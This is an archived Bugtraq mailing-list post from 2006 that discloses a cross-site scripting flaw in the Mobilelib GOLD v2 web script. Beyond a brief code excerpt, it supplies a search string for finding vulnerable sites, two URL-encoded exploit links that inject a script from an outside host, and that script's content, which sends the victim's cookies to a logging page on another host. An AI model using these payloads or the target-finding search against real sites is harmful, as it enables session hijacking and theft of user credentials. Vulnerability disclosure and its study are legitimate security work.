bugtraq
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

XSS in script Mobilelib GOLD v2

from [gamr-14] [Permanent Link][Original]
To: bugtraq@securityfocus.com
Subject: XSS in script Mobilelib GOLD v2
From: gamr-14@hotmail.com
Date: 28 Dec 2006 23:44:22 -0000
Delivered-to: sp-com-lists@consult.net
Delivered-to: bugtraq-list@securepoint.com
Delivered-to: mailing list bugtraq@securityfocus.com
Delivered-to: moderator for bugtraq@securityfocus.com
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@securityfocus.com; run by ezmlm 
/////////////////////////////////////
// XSS in script Mobilelib GOLD v2 //
////////////////////////////////////
Found By: viP HaCKEr
Tame : AL-GaRNi
Vendor: http://www.ac4p.com
Software: Mobilelib GOLD GOLD v2
google : "Powered by ac4p.com"
::::::::::::::::::::::::::::::::::::::
Description:

Line 32 of contact_us.php
:::::::::::::::::::::::::::::::::::::
code:
}
$html=getthemeM("show.tpl");
$html=eregi_replace("{marquee}","$Newnews",$html);
include("block.php");
$errr='';
function chek_mail($email)
   {
::::::::::::::::::::::::::::::::::::::
Exploits :

http://[target]/[path]/contact_us.php?email=%20%22%3E%3Cscript%20src%3Dhttp%3A//www.xxxx.com/swt.js%3E%3C/script%3E
  #

//and

http://[target]/[path]/contact_us.php?errr=%20%22%3E%3Cscript%20src%3Dhttp%3A//www.xxxx.com/swt.js%3E%3C/script%3E
   #
/****************************************************************//
//Content swt.js
location.href='http://www.yoursite.com/log.php?swt='+escape(document.cookie);  #

//End swt.js
############### Group AL-GaRNi ##################
/**********************************************#
/*SwEET-DeViL  &  viP HaCkEr  &   HaCkEr sUn *#
/********************************************#
#################(c)@2006####################
########## gamr-14@hotmail.com #############
########## Error-404@hotmail.com ##########
##########################################
[More with this subject...]
<Prev in Thread] Current Thread [Next in Thread>
Previous by Date:  XSS with default page parameter in Oracle Portal 10g, duchaikhtn
Next by Date:  QuickCam linux device driver allows arbitrary code execution, sapheal
Previous by Thread:  XSS with default page parameter in Oracle Portal 10g, duchaikhtn
Next by Thread:  Re: XSS in script Mobilelib GOLD v2, gamr-14
Indexes:  [Date] [Thread] [Top] [All Lists]